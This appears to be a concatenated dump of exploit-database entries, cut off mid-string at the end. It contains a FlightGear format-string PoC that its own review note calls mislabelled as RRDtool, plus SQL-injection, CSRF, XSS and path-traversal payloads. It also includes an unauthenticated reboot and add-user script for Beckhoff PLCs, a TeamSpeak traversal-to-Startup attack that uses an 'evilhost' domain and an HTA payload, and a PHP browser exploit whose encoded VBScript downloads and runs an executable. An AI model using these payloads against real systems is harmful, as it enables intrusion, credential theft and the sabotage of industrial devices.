An attacker may exploit this issue to execute arbitrary code within the context of the affected application or to crash the application.

RRDtool 1.4.7 is affected; other versions may also be vulnerable.

NOTE (review): the code below does not match this description. It connects to TCP port 5501 and issues FlightGear-style property-tree "set" commands (fgfs* helpers, /sim/rendering, /environment/cloudlayers) whose values contain "%n", so it appears to be a PoC for a format-string bug in a FlightGear telnet/property interface rather than for the RRDtool Python module. Treat this header as mislabelled until confirmed against the original BID.
*/

#include <stdio.h>  
#include <errno.h>  
#include <stdlib.h>  
#include <unistd.h>  
#include <sys/time.h>  
#include <sys/types.h>  
#include <sys/socket.h>  
#include <netdb.h>  
#include <netinet/in.h>  
#include <stdarg.h>  
#include <string.h>  
#define DFLTHOST     "www.example.com"  
#define DFLTPORT     5501  
#define MAXMSG          256  
#define fgfsclose     close  
void init_sockaddr(struct sockaddr_in *name, const char *hostname, unsigned port);  
int fgfswrite(int sock, char *msg, ...);  
const char *fgfsread(int sock, int wait);  
void fgfsflush(int sock);  
int fgfswrite(int sock, char *msg, ...)  
{  
  /* Send one protocol line to the server.
   * `msg` and the variadic arguments are printf-style; the formatted text is
   * echoed to stdout, terminated with CR LF and written to `sock`.
   * Returns the byte count reported by write(2); exits the process if the
   * write fails.  Formatted text longer than MAXMSG - 3 bytes is truncated. */
  char line[MAXMSG];
  size_t used;
  ssize_t sent;
  va_list ap;

  va_start(ap, msg);
  /* reserve two bytes for the line terminator appended below */
  vsnprintf(line, MAXMSG - 2, msg, ap);
  va_end(ap);

  printf("SEND: \t<%s>\n", line);

  used = strlen(line);
  line[used++] = '\015';
  line[used++] = '\012';
  line[used] = '\0';

  sent = write(sock, line, used);
  if (sent < 0) {
       perror("fgfswrite");
       exit(EXIT_FAILURE);
  }
  return (int)sent;
}
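const char *fgfsread(int sock, int timeout)  
{  
  /* Read one chunk from `sock`, waiting at most `timeout` seconds.
   * Returns the data (up to MAXMSG - 1 bytes) with trailing CR/LF removed,
   * or NULL when nothing arrived in time, select() failed, the peer closed
   * the connection, or only line terminators were received.  The result is
   * kept in a static buffer that the next call overwrites.  A read(2) error
   * terminates the process, as in the original. */
  static char buf[MAXMSG];
  fd_set ready;
  struct timeval tv;
  ssize_t len;
  char *end;

  /* FD_SET on a descriptor outside the fd_set is undefined behaviour */
  if (sock < 0 || sock >= FD_SETSIZE)
       return NULL;

  FD_ZERO(&ready);
  FD_SET(sock, &ready);
  tv.tv_sec = timeout;
  tv.tv_usec = 0;

  /* nfds must be the highest descriptor plus one.  The original hard-coded
   * 32, so a socket numbered 32 or higher was never reported readable and
   * every read silently "timed out".  A select() error (-1) is now treated
   * as "no data" instead of falling through to a possibly blocking read. */
  if (select(sock + 1, &ready, NULL, NULL, &tv) <= 0)
       return NULL;

  len = read(sock, buf, MAXMSG - 1);
  if (len < 0) {
       perror("fgfsread");
       exit(EXIT_FAILURE);
  }
  if (len == 0)
       return NULL;

  /* strip trailing CR / LF; len <= MAXMSG - 1 so buf[len] is in bounds */
  end = buf + len;
  while (end > buf && (end[-1] == '\015' || end[-1] == '\012'))
       end--;
  *end = '\0';

  return buf[0] ? buf : NULL;
}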
void fgfsflush(int sock)  
{  
  /* Drain and discard whatever the server has already sent.  fgfsread is
   * polled with a zero timeout so this never blocks; each discarded chunk
   * is echoed to stdout for the operator's benefit. */
  const char *chunk;

  for (;;) {
       chunk = fgfsread(sock, 0);
       if (chunk == NULL)
            break;
       printf("IGNORE: \t<%s>\n", chunk);
  }
}
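int fgfsconnect(const char *hostname, const int port)  
{  
  /* Open a TCP connection to hostname:port.
   * `hostname` may be a DNS name or a dotted quad.  Returns the connected
   * socket descriptor, or a negative code: -1 socket() failed, -2 the name
   * could not be resolved to an IPv4 address, -3 connect() failed.  Each
   * failure is reported on stderr and leaves no open descriptor behind. */
  struct sockaddr_in serv_addr;
  struct hostent *hostinfo;
  int sock;

  sock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
  if (sock < 0) {
       perror("fgfsconnect/socket");
       return -1;
  }

  hostinfo = gethostbyname(hostname);
  /* The original copied h_addr blindly; only an AF_INET answer fits sin_addr. */
  if (hostinfo == NULL || hostinfo->h_addrtype != AF_INET
      || hostinfo->h_addr_list[0] == NULL) {
       fprintf(stderr, "fgfsconnect: unknown host: \"%s\"\n", hostname);
       close(sock);
       return -2;
  }

  memset(&serv_addr, 0, sizeof(serv_addr));   /* sin_zero was left uninitialised before */
  serv_addr.sin_family = AF_INET;
  serv_addr.sin_port = htons((unsigned short)port);
  memcpy(&serv_addr.sin_addr, hostinfo->h_addr_list[0], sizeof(serv_addr.sin_addr));

  if (connect(sock, (struct sockaddr *)&serv_addr, sizeof(serv_addr)) < 0) {
       perror("fgfsconnect/connect");
       close(sock);
       return -3;
  }
  return sock;
}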
int main(int argc, char **argv)  
{  
  /* Drive the property-tree telnet interface: plant "%n" as the name of
   * several cloud layers, then cycle each layer's coverage so the names get
   * used.  argv[1] overrides DFLTHOST, argv[2] overrides DFLTPORT. */
  const char *host = (argc > 1) ? argv[1] : DFLTHOST;
  unsigned port = (argc > 2) ? atoi(argv[2]) : DFLTPORT;
  const char *reply;
  int layer;
  int sock = fgfsconnect(host, port);

  if (sock < 0)
       return EXIT_FAILURE;

  fgfswrite(sock, "data");
  fgfswrite(sock, "set /sim/rendering/clouds3d-enable true");
  fgfswrite(sock, "set /environment/clouds");

  /* one "%n" name per layer index and cloud type */
  for (layer = 0; layer < 5; layer++) {
       fgfswrite(sock, "set /environment/cloudlayers/layers[%d]/cu/cloud/name %%n", layer);
       fgfswrite(sock, "set /environment/cloudlayers/layers[%d]/cb/cloud/name %%n", layer);
       fgfswrite(sock, "set /environment/cloudlayers/layers[%d]/ac/cloud/name %%n", layer);
       fgfswrite(sock, "set /environment/cloudlayers/layers[%d]/st/cloud/name %%n", layer);
       fgfswrite(sock, "set /environment/cloudlayers/layers[%d]/ns/cloud/name %%n", layer);
  }
  reply = fgfsread(sock, 3);
  if (reply != NULL)
       printf("READ: \t<%s>\n", reply);

  /* toggling coverage forces the layers (and their names) to be processed */
  for (layer = 0; layer < 5; layer++) {
       fgfswrite(sock, "set /environment/clouds/layer[%d]/coverage scattered", layer);
       fgfswrite(sock, "set /environment/clouds/layer[%d]/coverage cirrus", layer);
       fgfswrite(sock, "set /environment/clouds/layer[%d]/coverage clear", layer);
  }
  reply = fgfsread(sock, 3);
  if (reply != NULL)
       printf("READ: \t<%s>\n", reply);

  fgfswrite(sock, "quit");
  fgfsclose(sock);
  return EXIT_SUCCESS;
}
            
source: https://www.securityfocus.com/bid/59934/info

Jojo CMS is prone to an SQL-injection vulnerability because it fails to sanitize user-supplied input.

A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Jojo CMS 1.2 is vulnerable; other versions may also be affected. 

POST /articles/test/ HTTP/1.1
X-Forwarded-For: ' OR 1=1 INTO OUTFILE '/var/www/file.php' -- 
Content-Type: application/x-www-form-urlencoded
Content-Length: 88

name=name&email=user%40mail.com&website=&anchortext=&comment=comment&submit=Post+Comment
            
source: https://www.securityfocus.com/bid/59940/info

The WP cleanfix plugin for WordPress is prone to a cross-site request-forgery vulnerability.

Exploiting this issue may allow a remote attacker to perform certain unauthorized actions in the context of the affected application. Other attacks are also possible.

WP cleanfix 2.4.4 is vulnerable; other versions may also be affected. 

<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <form action="http://www.example.com/wordpress/wordpress-351/wp-admin/admin-ajax.php" method="POST">
      <input type="hidden" name="action" value="wpCleanFixAjax" />
      <input type="hidden" name="command" value="echo&#32;phpversion&#40;&#41;&#59;" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
            
source: https://www.securityfocus.com/bid/59933/info

Jojo CMS is prone to a cross-site scripting vulnerability.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.

Jojo CMS 1.2 is vulnerable; other versions may also be affected. 

<form action="http://www.example.com/forgot-password/" method="post">
<input type="hidden" name="search" value='<script>alert(document.cookie);</script>'>
<input type="submit" id="btn">
</form>
            
source: https://www.securityfocus.com/bid/59932/info

The Mail On Update plugin for WordPress is prone to a cross-site request-forgery vulnerability.

Exploiting this issue may allow a remote attacker to perform certain unauthorized actions in the context of the affected application. Other attacks are also possible.

Mail On Update 5.1.0 is vulnerable; prior versions may also be affected. 

<html><form action="https://example.com/wp/wp-admin/options-general.php?page=mail-on-update" method="post" 
class="buttom-primary">
<input name="mailonupdate_mailto" type="hidden" value="example0 () example com
example1 () example com
example2 () example com
example3 () example com
example4 () example com
example5 () example com
example6 () example com
example7 () example com
example8 () example com
example9 () example com
example10 () example com
henri+monkey () nerv fi" />
<input name="submit" type="submit" value="Save"/></form></html>
            
source: https://www.securityfocus.com/bid/59928/info

Open Flash Chart is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. 

http://www.example.com/joomla/components/com_jnews/includes/openflashchart/open-flash-chart.swf?get-data=(function(){alert(document.cookie)})() 
            
source: https://www.securityfocus.com/bid/59886/info

The wp-FileManager plugin for WordPress is prone to a vulnerability that lets attackers download arbitrary files because the application fails to sufficiently sanitize user-supplied input.

An attacker can exploit this issue to download arbitrary files within the context of the web server process. Information obtained may aid in further attacks. 

http://www.example.com/wp-content/plugins/wp-filemanager/incl/libfile.php?&path=../../&filename=wp-config.php&action=download 
            
#!/usr/bin/env python
'''
    # Exploit Title: Beckhoff CX9020 CPU Module Web Exploit (RCE)
    # Date: 2015-10-22
    # Exploit Author: Photubias - tijl[dot]deneut[at]howest[dot]be, based on work by Frank Lycops (frank.lycops@thesecurityfactory.be)
    # Vendor Homepage: https://www.beckhoff.com/english.asp?embedded_pc/cx9020.htm
    # Version: TwinCat UpnpWebsite < 3.1.4018.13, fixed with ftp://ftp.beckhoff.com/software/embPC-Control/CX90xx/CX9020/CE/TC3/CX9020_CB3011_WEC7_HPS_v602i_TC31_B4018.13.zip
    # Tested on: Python runs on any Windows or Linux
    # CVE : CVE-2015-4051 (similar to this CVE, but different service IPC Diagnostics Authentication <> Web Authentication)

    Copyright 2015 Photubias(c)

    Written for Howest(c) University College, Ghent University, XiaK

    This program is free software: you can redistribute it and/or modify
    it under the terms of the GNU General Public License as published by
    the Free Software Foundation, either version 3 of the License, or
    (at your option) any later version.

    This program is distributed in the hope that it will be useful,
    but WITHOUT ANY WARRANTY; without even the implied warranty of
    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
    GNU General Public License for more details.

    You should have received a copy of the GNU General Public License
    along with this program.  If not, see <http://www.gnu.org/licenses/>.

File name CX9020-WebControl.py
written by tijl[dot]deneut[at]howest[dot]be
This PoC can reboot any CX9020 PLC and add arbitrary (web) users; both actions are reachable without credentials.
 -> Test by going to http://<IP>/config (redirects to http://<NAME>:5120/UpnpWebsite/index.htm)
 -> Default credentials are guest/1 and webguest/1, but this exploit works without credentials
 -> Verify the website version by logging into http://<IP>/config and clicking "TwinCAT"
'''
import sys, httplib, socket, re, base64

## Defining Functions first:
def rebootMachine(UNS, IP, IO):
        """Send one unauthenticated cxconfig ``Write`` SOAP request that reboots the PLC.

        The request is a plain HTTP POST to ``IP:5120`` (legacy Python 2
        ``httplib.HTTP`` interface, no credentials of any kind are sent).

        Args:
            UNS: UUID string of the target, embedded in the request path
                 (``/upnpisapi?uuid:<UNS>+urn:beckhoff.com:serviceId:cxconfig``).
            IP:  target IPv4 address (also used for the Host header).
            IO:  IndexOffset as a decimal string; it is sent negated
                 (``<IndexOffset>-IO</IndexOffset>``).

        Returns:
            1 when the device answers HTTP 200, 0 for any other status (the
            response body is printed so the caller can try another index).

        Detection note: the fixed ``User-Agent: Tijls Python Script`` header,
        the ``SOAPAction: urn:beckhoff.com:service:cxconfig:1#Write`` header
        and the ``/upnpisapi`` path on TCP 5120 are all static strings.
        """
        ## This is the SOAP Message:
        SoapMessage = "<?xml version=\"1.0\" encoding=\"utf-8\"?><s:Envelope s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\" xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\">"
        SoapMessage += "<s:Body><u:Write xmlns:u=\"urn:beckhoff.com:service:cxconfig:1\"><netId></netId><nPort>0</nPort><indexGroup>0</indexGroup>"
        SoapMessage += "<IndexOffset>-" + IO + "</IndexOffset>"
        # pData "AQAAAAAA" is base64 for the bytes 01 00 00 00 00 00 -- presumably
        # a little-endian 1 acting as the "reboot" flag; not verified here.
        SoapMessage += "<pData>AQAAAAAA</pData></u:Write></s:Body></s:Envelope>"

        ## Construct and send the HTTP POST header
        rebootwebservice = httplib.HTTP(IP + ":5120")
        rebootwebservice.putrequest("POST", "/upnpisapi?uuid:" + UNS + "+urn:beckhoff.com:serviceId:cxconfig")
        rebootwebservice.putheader("Host", IP + ":5120")
        rebootwebservice.putheader("User-Agent", "Tijls Python Script")
        rebootwebservice.putheader("Content-type", "text/xml; charset=utf-8")
        rebootwebservice.putheader("Content-length", "%d" % len(SoapMessage))
        rebootwebservice.putheader("SOAPAction", "urn:beckhoff.com:service:cxconfig:1#Write")
        rebootwebservice.endheaders()
        rebootwebservice.send(SoapMessage)

        ## Get the response
        # statusmessage and header are only used by the commented-out prints below.
        statuscode, statusmessage, header = rebootwebservice.getreply()
        if statuscode == 200:
                print "Exploit worked, device should be rebooting!"
                return 1
        else:
                # A non-200 answer is treated as "wrong IndexOffset"; the caller
                # retries with the other candidate offset on a 0 return.
                print "Something went wrong, the used index is probably wrong? This is the response code:"
                ## Printing HTTP Response code
                res = rebootwebservice.getfile().read()
                print res
                return 0

        #print "Response: ", statuscode, statusmessage
        #print "headers: ", header

def addUser(UNS, IP, PDATA, IO):
        """Send one unauthenticated cxconfig ``Write`` SOAP request carrying a user record.

        Identical on the wire to rebootMachine except that the caller-supplied
        ``PDATA`` blob is placed in ``<pData>``; no credentials are sent.

        Args:
            UNS:   UUID string of the target, embedded in the request path.
            IP:    target IPv4 address; the POST goes to port 5120.
            PDATA: base64 text written into ``<pData>``; the caller is
                   responsible for its layout (see addOwnUser).
            IO:    IndexOffset as a decimal string, sent negated.

        Returns:
            1 on HTTP 200, 0 otherwise (response body printed).

        Detection note: same static markers as rebootMachine --
        ``User-Agent: Tijls Python Script``, ``SOAPAction:
        urn:beckhoff.com:service:cxconfig:1#Write`` and the ``/upnpisapi``
        path on TCP 5120.
        """
        ## This is the SOAP Message:
        SoapMessage = '<?xml version="1.0" encoding="utf-8"?><s:Envelope s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/" xmlns:s="http://schemas.xmlsoap.org/soap/envelope/">'
        SoapMessage += '<s:Body><u:Write xmlns:u="urn:beckhoff.com:service:cxconfig:1"><netId></netId><nPort>0</nPort><indexGroup>0</indexGroup>'
        SoapMessage += '<IndexOffset>-' + IO + '</IndexOffset>'
        SoapMessage += '<pData>' + PDATA + '</pData></u:Write></s:Body></s:Envelope>'

        ## Construct and send the HTTP POST header
        rebootwebservice = httplib.HTTP(IP + ":5120")
        rebootwebservice.putrequest("POST", "/upnpisapi?uuid:" + UNS + "+urn:beckhoff.com:serviceId:cxconfig")
        rebootwebservice.putheader("Host", IP + ":5120")
        rebootwebservice.putheader("User-Agent", "Tijls Python Script")
        rebootwebservice.putheader("Content-type", "text/xml; charset=utf-8")
        rebootwebservice.putheader("Content-length", "%d" % len(SoapMessage))
        rebootwebservice.putheader("SOAPAction", "urn:beckhoff.com:service:cxconfig:1#Write")
        rebootwebservice.endheaders()
        rebootwebservice.send(SoapMessage)

        ## Get the response
        # statusmessage and header are only used by the commented-out prints below.
        statuscode, statusmessage, header = rebootwebservice.getreply()
        if statuscode == 200:
                print "Exploit worked, user is added!"
                return 1
        else:
                # Non-200 is read as "wrong IndexOffset"; the caller retries with
                # the other candidate offset when 0 comes back.
                print "Something went wrong, the used index is probably wrong? This is the response code:"
                ## Printing HTTP Response code
                res = rebootwebservice.getfile().read()
                print res
                return 0

        #print "Response: ", statuscode, statusmessage
        #print "headers: ", header

def addOwnUser(UNS, IP, IO):
        """Prompt for a username and password, pack them into the pData record and call addUser.

        Record layout as built below (one byte per field unless noted):
        total length (16 + len(username + password)), 3 zero bytes,
        len(username), 7 zero bytes, len(password), 3 zero bytes, then the
        username immediately followed by the password.  Each length goes
        through chr(), so a combined length above 239 raises ValueError.

        Args:
            UNS, IP, IO: passed straight through to addUser.

        Returns:
            addUser's result: 1 on HTTP 200, else 0.
        """
        ## This will prompt for username and password and then create the custom pData string
        USERNAME = raw_input("Please enter the username: ")
        PASSWORD = raw_input("Please enter the password: ")
        CONCATENATED = USERNAME + PASSWORD        
        
        # Creating the Full String to encode
        FULLSTRING = chr(16+len(CONCATENATED))
        FULLSTRING += chr(0)+chr(0)+chr(0)
        FULLSTRING += chr(len(USERNAME))
        FULLSTRING += chr(0)+chr(0)+chr(0)+chr(0)+chr(0)+chr(0)+chr(0)
        FULLSTRING += chr(len(PASSWORD))
        FULLSTRING += chr(0)+chr(0)+chr(0)
        FULLSTRING += CONCATENATED

        # Encode a first time, but we don't want any '=' signs in the encoded version
        # Each appended NUL changes len(FULLSTRING) mod 3, so at most two
        # retries are needed to reach a base64 length without '=' padding.
        PDATA = base64.b64encode(FULLSTRING)
        if PDATA.endswith('='):
                FULLSTRING += chr(0)
                PDATA = base64.b64encode(FULLSTRING)
        if PDATA.endswith('='):
                FULLSTRING += chr(0)
                PDATA = base64.b64encode(FULLSTRING)

        # Now we have the correct PDATA string
        print 'We will use this string: '+PDATA
        return addUser(UNS, IP, PDATA, IO)

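def is_ipv4(ip):
    """Return True when ``ip`` is a dotted-quad IPv4 address in text form.

    Accepted form: exactly four decimal octets separated by dots, each in
    0..255, with the first octet at least 1 (``0.x.x.x`` is rejected).
    Leading zeros are tolerated (``01.2.3.4``).

    Args:
        ip: the candidate address string.

    Returns:
        bool.  Never raises for string input: an empty octet (``1..2.3``)
        or a trailing newline yields False instead of a ValueError or a
        false positive.
    """
    # \d{1,3} rather than \d{0,3}: an empty octet must not reach int().
    # \A / \Z rather than ^ / $: '$' also matches before a trailing newline,
    # which would let "1.2.3.4\n" through a full-string validation.
    match = re.match(r"\A(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})\Z", ip)
    if not match:
        return False
    quad = [int(number) for number in match.groups()]
    if quad[0] < 1:
        return False
    # \d guarantees non-negative, so only the upper bound needs checking.
    return all(number <= 255 for number in quad)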

###### START PROGRAM #######
# Target selection: one optional argv[1], otherwise an interactive prompt.
# The value is validated as a dotted quad before any packet is sent.
if not len(sys.argv) == 2:
        IP = raw_input("Please enter the IPv4 address of the Beckhoff PLC: ")
else:
        IP = sys.argv[1]
        
if not is_ipv4(IP):
	print "Please go read RFC 791 and then use a legitimate IPv4 address."
	sys.exit()

## Initialize variables
# Two IndexOffset candidates per action. The menu below tries the "Inactive"
# value first and falls back to the "Active" one when the device does not
# answer HTTP 200 (rebootMachine / addUser return 0 in that case).
UNS = ''
ActiveRebootIndOff = '1329528576' # Active means active Engineering Licenses (when PLC has been programmed less than a week ago)
InactiveRebootIndOff = '1330577152'
ActiveUserIndOff = '1339031296'
InactiveUserIndOff = '1340079872'

print 'Finding the unique UNS (UUID) of the target system (' + IP + '), hold on...\n'

# SSDP M-SEARCH. The HOST header names the multicast group, but the datagram
# is sent unicast straight to IP:1900 (sendto below), so only the target
# answers and nothing else on the segment is probed.
DISCOVERY_MSG = ('M-SEARCH * HTTP/1.1\r\n' +
                 'HOST: 239.255.255.250:1900\r\n' +
                 'MAN: "ssdp:discover"\r\n' +
                 'MX: 3\r\n' +
                 'ST: upnp:rootdevice\r\n' +
                 '\r\n')

SOCK = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
SOCK.settimeout(10)
SOCK.sendto(DISCOVERY_MSG, (IP, 1900))
try:
        RESPONSE = SOCK.recv(1000).split('\r\n')
# Bare except: the 10 s socket.timeout is the expected failure, but every other
# error (e.g. a network unreachable) is reported with the same message.
except:
        print 'Something went wrong, is the system online?\nTry opening http://' + IP + ':5120/config\n'
        raw_input('Press Enter to continue...')
        sys.exit(0)

# Fixed slice [9:45]: presumes a 'USN:uuid:<36-char uuid>' line with no space
# after the colon -- not validated; if several lines match, the last one wins.
for LINE in RESPONSE:
        if ':uuid' in LINE:
                UNS = LINE[9:45]
                print 'Got it: ' + LINE[9:45] + '\n'
SOCK.close()

if not UNS:
        print '\n\nProblem finding UNS, this is full SSDP response: \n'
        for LINE in RESPONSE: print LINE
        # NOTE(review): input() under Python 2 eval()s the typed line, unlike the
        # raw_input() used for the other prompts; an empty line raises here.
        input('Press Enter to continue...')
        sys.exit(0)
else:
        print 'Let\'s go, choose your option:'
        print '1 = reboot PLC'
        # Option 2 sends a fixed pData blob in the same record layout that
        # addOwnUser builds (user "tijl", password "xiak" per the menu text).
        print '2 = add user tijl with password xiak'
        print '3 = add user from your choosing'
        usr_input = raw_input('Select a number: ')
        if usr_input == '1':
                if not rebootMachine(UNS, IP, InactiveRebootIndOff):
                        rebootMachine(UNS, IP, ActiveRebootIndOff)
                raw_input('Press Enter to continue...')
        elif usr_input == '2':
                if not addUser(UNS, IP, 'GAAAAAQAAAAAAAAABAAAAHRpamx4aWFr', InactiveUserIndOff):
                        addUser(UNS, IP, 'GAAAAAQAAAAAAAAABAAAAHRpamx4aWFr', ActiveUserIndOff)
                raw_input('Press Enter to continue...')
        elif usr_input == '3':
                if not addOwnUser(UNS, IP, InactiveUserIndOff):
                        addOwnUser(UNS, IP, ActiveUserIndOff)
                raw_input('Press Enter to continue...')
        else:
                print 'Please choose a sensible input next time, exiting.'
                # NOTE(review): same input() vs raw_input() inconsistency as above.
                input('Press Enter to continue...')
                sys.exit()
        
            
Exploit Title: "PwnSpeak" a 0day Exploit for TeamSpeak Client <= 3.0.18.1 RFI to RCE
Date: 12/10/2015
Author: Scurippio <scurippio@anche.no> / (0x6FB30B11 my pgp keyid) 
Vendor Homepage: https://www.teamspeak.com/ 
Application:  TeamSpeak 3
Version:  TeamSpeak3 Client 3.0.0 - 3.0.18.1
Platforms:  Windows, Mac OS X and Linux
Exploitation: Remote
Risk : Very High

=========
The Bug
=========

The bug is a simple but critical RFI (Remote File Inclusion); in my test case on Windows it leads to remote code execution.
By changing the channel description you can insert a [img] bb tag with malicious content.

There are a few problems with the image caching on disk.

1: There is no check on file extension.

2: There is no file renaming, and you can fake the extension so you can create in the cache a malicious executable file like hta, scr, msi, pif, vbs etc. 

	Example:

	[img] http://yourevilhost.com/thefile.hta [/img]
	[img] http://yourevilhost.com/thefile.msi [/img]
	[img] http://yourevilhost.com/thefile.vbs [/img]
	...

3: Teamspeak 3 Client saves the image and recreates the same directory structure as the server where it's hosted.

	Example:

	C:\Users\YourUser\AppData\Roaming\TS3Client\cache\remote\yourevilhost.com\thefile.hta
	C:\Users\YourUser\AppData\Roaming\TS3Client\cache\remote\yourevilhost.com\thefile.msi
	C:\Users\YourUser\AppData\Roaming\TS3Client\cache\remote\yourevilhost.com\thefile.vbs
	...

4: It is possible to perform a directory traversal by simply URL-encoding the traversal path, bypassing the built-in check.
This is the critical hole: if you combine it with the previous issues, you can save a malicious file to any path on the OS with the same permissions as the TeamSpeak client.

	Example:

	[img]http://evildomain.com/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cDesktop%5cOwnedByNonnOreste.hta[/img]

If you set this bbcode on a channel description every user that sees it will download a file named "OwnedByNonnOreste.hta" on their Desktop with 0byte, you can also put images or other file extension!

The built-in image fetcher in the TeamSpeak client checks the content type and the file header to verify that the response is a real image, but this control is easily bypassed, so the exploit payload can still be placed in the file.

==========================================
Bypass / Vector / Payload
==========================================
To bypass the control and put arbitrary data in your malicious file you only need a web server and you can easily set the Rewrite rule for the Exploitation.

	Example:
	
	RewriteEngine On
	RewriteCond %{REQUEST_URI} !/faker.php
	RewriteRule .* /faker.php

Then you need to write a simple php script to fake the payload as a png by sending the right content type and file header.

	Example:
	
	<?php
	header ('Content-type: image/png');
	echo "\211PNG\r\n\032\n";
	?>
	<html>
	<head>
	<title>PWN3D</title>
	<HTA:APPLICATION
	  APPLICATIONNAME="OwnedByScurippio"
	  ID="SnappySnappySna"
	  VERSION="1.0"/>

	<script language="VBScript">
		
	   Sub RunProgram
			Set objShell = CreateObject("Wscript.Shell")
			objShell.Run "calc.exe"
		End Sub
		RunProgram
	</script>
	</head>
	</html>

If you save the file in the windows startup directory you can achieve a remote code execution.

	Example:

	[img]http://example.com/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cRoaming%5cMicrosoft%5cWindows%5cStart%20Menu%5cPrograms%5cStartup%5cWelcomeAndOwnedByNonnOreste.hta[/img]
	[img]http://example.com/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cRoaming%5cMicrosoft%5cWindows%5cStart%20Menu%5cPrograms%5cStartup%5cWelcomeAndOwnedByNonnOreste.hta[/img]

The HTA file is a perfect vector for this exploit: you can execute trusted VBScript (shell commands or anything else), and the PNG header doesn't compromise the markup syntax.
At the next OS boot the victim will execute the malicious HTA file.

=======
Fix 
=======

Update to the beta channel or wait for the 3.0.18.2 hotfix for this exploit!

======
Info 
======

10/20/2015 - I have reported this Vulnerability to Teamspeak developers team  

********* - Release the public exploit

- Fuck the 'Captatori' - Tracciabili

(Snappy is always with you :P )


Copyright (c) 2015 Scurippio

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without my express
written consent. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please email me for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.
            
#!/usr/bin/php
<?php
	##########################################################
    # Author         :   Ehsan Noreddini
    # E-Mail         :   me@ehsann.info
    # Social	     :   @prot3ct0r
    # Title          : The World Browser Remote Code Execution
	# TheWorld Browser is a tiny, fast and powerful web Browser. It is completely free. There is no function limitation.
    # Version        :   3.0 Final
	# Date           :   22 October 2015
    # CVE            :   CVE2014-6332
    # Tested on      :   Windows7
	# Download       :   http://theworld.cn/twen/download.html
	# Website        :   http://theworld.cn
    ##########################################################
    # 1. run php code : php exploit.php
    # 2. get the output address and open it in browser !
	##########################################################
	# shot          : http://ehsann.info/proof/The_World_Browser_R_C_E.png
	# Original Code : http://ehsann.info/exploit/4.txt
    ##########################################################
	
	# Listener setup: binds address 0 (all interfaces) on $port and leaves the
	# socket listening; the accept loop comes further down, after $msgd.
	print "TheWorld Browser Remote Code Execution Exploit \r\n";
    $port=80; # Port Address
    # $link is substituted for the DOWNLOAD token inside $msgd (str_replace
    # below); decoded from the hex literal, the served VBScript has
    # powershell.exe fetch that URL as load.exe and ShellExecute() it.
    $link="http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe"; # Your malicious file
    $socket = socket_create(AF_INET, SOCK_STREAM, 0) or die('Failed to create socket!');
    # Return values of bind/listen are not checked: a port already in use (or
    # an unprivileged bind to 80) is only noticed when accept() never succeeds.
    socket_bind($socket, 0,$port);
    socket_listen($socket);
	# MS14-064
    $msgd = "\x3C\x68\x74\x6D\x6C\x3E\x0D\x0A\x3C\x6D\x65\x74\x61\x20\x68\x74\x74\x70\x2D\x65\x71\x75\x69\x76\x3D\x22\x58\x2D\x55\x41\x2D\x43\x6F\x6D\x70\x61\x74\x69\x62\x6C\x65\x22\x20\x63\x6F\x6E\x74\x65\x6E\x74\x3D\x22\x49\x45\x3D\x45\x6D\x75\x6C\x61\x74\x65\x49\x45\x38\x22\x20\x3E\x0D\x0A\x3C\x68\x65\x61\x64\x3E\x0D\x0A\x3C\x2F\x68\x65\x61\x64\x3E\x0D\x0A\x3C\x62\x6F\x64\x79\x3E\x0D\x0A\x20\x0D\x0A\x3C\x53\x43\x52\x49\x50\x54\x20\x4C\x41\x4E\x47\x55\x41\x47\x45\x3D\x22\x56\x42\x53\x63\x72\x69\x70\x74\x22\x3E\x0D\x0A\x66\x75\x6E\x63\x74\x69\x6F\x6E\x20\x72\x75\x6E\x6D\x75\x6D\x61\x61\x28\x29\x20\x0D\x0A\x4F\x6E\x20\x45\x72\x72\x6F\x72\x20\x52\x65\x73\x75\x6D\x65\x20\x4E\x65\x78\x74\x0D\x0A\x73\x65\x74\x20\x73\x68\x65\x6C\x6C\x3D\x63\x72\x65\x61\x74\x65\x6F\x62\x6A\x65\x63\x74\x28\x22\x53\x68\x65\x6C\x6C\x2E\x41\x70\x70\x6C\x69\x63\x61\x74\x69\x6F\x6E\x22\x29\x0D\x0A\x63\x6F\x6D\x6D\x61\x6E\x64\x3D\x22\x49\x6E\x76\x6F\x6B\x65\x2D\x45\x78\x70\x72\x65\x73\x73\x69\x6F\x6E\x20\x24\x28\x4E\x65\x77\x2D\x4F\x62\x6A\x65\x63\x74\x20\x53\x79\x73\x74\x65\x6D\x2E\x4E\x65\x74\x2E\x57\x65\x62\x43\x6C\x69\x65\x6E\x74\x29\x2E\x44\x6F\x77\x6E\x6C\x6F\x61\x64\x46\x69\x6C\x65\x28\x27\x44\x4F\x57\x4E\x4C\x4F\x41\x44\x27\x2C\x27\x6C\x6F\x61\x64\x2E\x65\x78\x65\x27\x29\x3B\x24\x28\x4E\x65\x77\x2D\x4F\x62\x6A\x65\x63\x74\x20\x2D\x63\x6F\x6D\x20\x53\x68\x65\x6C\x6C\x2E\x41\x70\x70\x